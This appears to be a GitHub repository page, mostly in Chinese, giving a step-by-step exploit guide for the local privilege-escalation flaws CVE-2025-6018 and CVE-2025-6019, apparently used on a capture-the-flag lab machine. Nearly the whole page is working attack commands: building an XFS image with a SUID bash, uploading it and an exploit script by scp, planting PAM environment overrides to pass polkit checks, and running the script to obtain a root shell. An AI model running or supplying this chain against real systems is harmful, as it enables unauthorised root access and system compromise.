e1arth/CVE-2025-6018

GitHub: e1arth/CVE-2025-6018

针对CVE-2025-6018和CVE-2025-6019的本地提权利用工具,通过构造恶意XFS镜像配合PAM环境变量劫持实现root权限获取。

Stars: 0 | Forks: 0

# CVE-2025-6018 + CVE-2025-6019 提权指南 [中文](https://github.com/muyuanlove/CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit/blob/main/readme_zh-cn.md) ## 📋 快速利用步骤 ### 步骤 1:准备 XFS 镜像(本地机器) ``` # 创建 300MB XFS 镜像 dd if=/dev/zero of=xfs.image bs=1M count=300 mkfs.xfs -f xfs.image # 挂载并安装 SUID bash mkdir mnt sudo mount -t xfs xfs.image mnt sudo cp /bin/bash mnt/bash sudo chmod 4755 mnt/bash sudo umount mnt rmdir mnt # 验证 (应显示 300M) ls -lh xfs.image ``` ### 步骤 2:上传文件到目标 ``` # 上传 exploit 脚本和镜像 scp exp.sh abc@10.129.252.9:~/ scp xfs.image abc@10.129.252.9:~/ ``` ### 步骤 3:首次登录 - 配置 PAM ``` # SSH 登录到目标 ssh phileasfogg3@10.129.252.9 # 写入 PAM 环境变量 cat > ~/.pam_environment << 'EOF' XDG_SEAT OVERRIDE=seat0 XDG_VTNR OVERRIDE=1 EOF # 验证配置 cat ~/.pam_environment # 🔥 关键:注销 (以激活 PAM 配置) exit ``` ### 步骤 4:第二次登录 - 执行提权 ``` # 通过 SSH 重新登录 (PAM 配置现已激活) ssh phileasfogg3@10.129.252.9 # 验证 PAM 是否处于活动状态 (应返回 "('yes',)") gdbus call --system --dest org.freedesktop.login1 \ --object-path /org/freedesktop/login1 \ --method org.freedesktop.login1.Manager.CanReboot # 执行 privilege escalation 脚本 bash exp.sh ``` ## ✅ 成功指标 如果利用成功,你应该看到: ``` ✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash ✓ Root access confirmed! ════════════════════════════════════════════════════════════ ║ ROOT FLAG ║ ║ ║ ════════════════════════════════════════════════════════════ bash-5.2# whoami root ``` ## 🔧 故障排除 | 问题 | 解决方案 | | ----------------------------- | ------------------------------------------------ | | `CanReboot` 返回 `('no',)` | 确保你已登出并重新登录(步骤 3) | | `Not authorized` 错误 | 检查 `~/.pam_environment` 内容是否正确 | | 找不到 SUID bash | 重新上传 `xfs.image` 并验证 SUID 位是否设置 | ## 📌 关键点 - ✅ **必须登出并重新登录**:PAM 配置仅在新会话中生效 - ✅ **验证 CanReboot**:在运行脚本前确认它返回 `('yes',)` - ✅ **使用 SSH 登录**:不要使用 `ssh -t user@host "cmd"` 风格的执行方式 ## 🐱 猫卫士 **如果失败,请确保每一步都严格按照顺序执行!**
标签:CSV导出, CVE-2025-6018, CVE-2025-6019, Exploit, PAM利用, Polkit, SUID提权, systemd, Web报告查看器, XFS文件系统, 内存分配, 协议分析, 应用安全, 提权漏洞, 攻击脚本, 本地提权, 权限提升, 漏洞复现, 网络安全, 隐私保护